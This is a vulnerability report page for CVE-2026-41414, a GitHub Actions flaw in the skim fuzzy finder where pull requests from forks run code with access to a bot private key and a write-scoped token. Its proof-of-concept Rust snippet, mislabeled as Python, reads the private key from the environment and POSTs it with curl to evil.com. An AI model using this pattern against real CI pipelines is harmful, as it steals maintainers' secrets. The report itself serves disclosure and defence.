Security Vulnerability Report
中文
CVE-2026-41414 CVSS 7.4 HIGH

CVE-2026-41414

Published: 2026-04-24 19:17:13
Last Modified: 2026-05-01 19:03:15

Description

Skim is a fuzzy finder designed to through files, lines, and commands. The generate-files job in .github/workflows/pr.yml checks out attacker-controlled fork code and executes it via cargo run, with access to SKIM_RS_BOT_PRIVATE_KEY and GITHUB_TOKEN (contents:write). No gates prevent exploitation - any GitHub user can trigger this by opening a pull request from a fork. This vulnerability is fixed with commit bf63404ad51985b00ed304690ba9d477860a5a75.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:skim-rs:skim:*:*:*:*:*:rust:*:* - VULNERABLE
Skim < commit bf63404ad51985b00ed304690ba9d477860a5a75

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// src/main.rs use std::env; use std::process::Command; fn main() { // Attempt to exfiltrate the private key if let Ok(token) = env::var("SKIM_RS_BOT_PRIVATE_KEY") { let _ = Command::new("curl") .arg("-X") .arg("POST") .arg("-d") .arg(&token) .arg("https://evil.com/steal") .spawn(); } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41414", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:13.020", "lastModified": "2026-05-01T19:03:15.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Skim is a fuzzy finder designed to through files, lines, and commands. The generate-files job in .github/workflows/pr.yml checks out attacker-controlled fork code and executes it via cargo run, with access to SKIM_RS_BOT_PRIVATE_KEY and GITHUB_TOKEN (contents:write). No gates prevent exploitation - any GitHub user can trigger this by opening a pull request from a fork. This vulnerability is fixed with commit bf63404ad51985b00ed304690ba9d477860a5a75."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:skim-rs:skim:*:*:*:*:*:rust:*:*", "versionEndExcluding": "4.6.1", "matchCriteriaId": "C3FDFA7B-CF76-465F-A354-91CDD67988F7"}]}]}], "references": [{"url": "https://github.com/skim-rs/skim/commit/bf63404ad51985b00ed304690ba9d477860a5a75", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/skim-rs/skim/security/advisories/GHSA-9g93-rxr5-xhqw", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://drive.google.com/file/d/1Gj7ziTK42YWXYoQgTbis_rMitHR59J6F/view", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}, {"url": "https://github.com/skim-rs/skim/security/advisories/GHSA-9g93-rxr5-xhqw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}